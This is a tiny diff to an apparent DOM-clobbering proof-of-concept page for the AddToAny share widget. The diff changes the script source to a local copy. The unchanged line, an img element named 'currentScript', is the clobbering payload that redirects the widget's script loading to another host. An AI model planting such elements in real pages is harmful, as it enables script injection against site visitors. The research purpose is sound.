--- a/domc-gadgets-assets/addtoany/poc.html
+++ b/domc-gadgets-assets/addtoany/poc.html
@@ -1,2 +1,2 @@
 <img src="https://addtoany.xxx.xxx" name="currentScript">
-<script async src="https://static.addtoany.com/menu/page.js"></script>
+<script async src="page.js"></script>
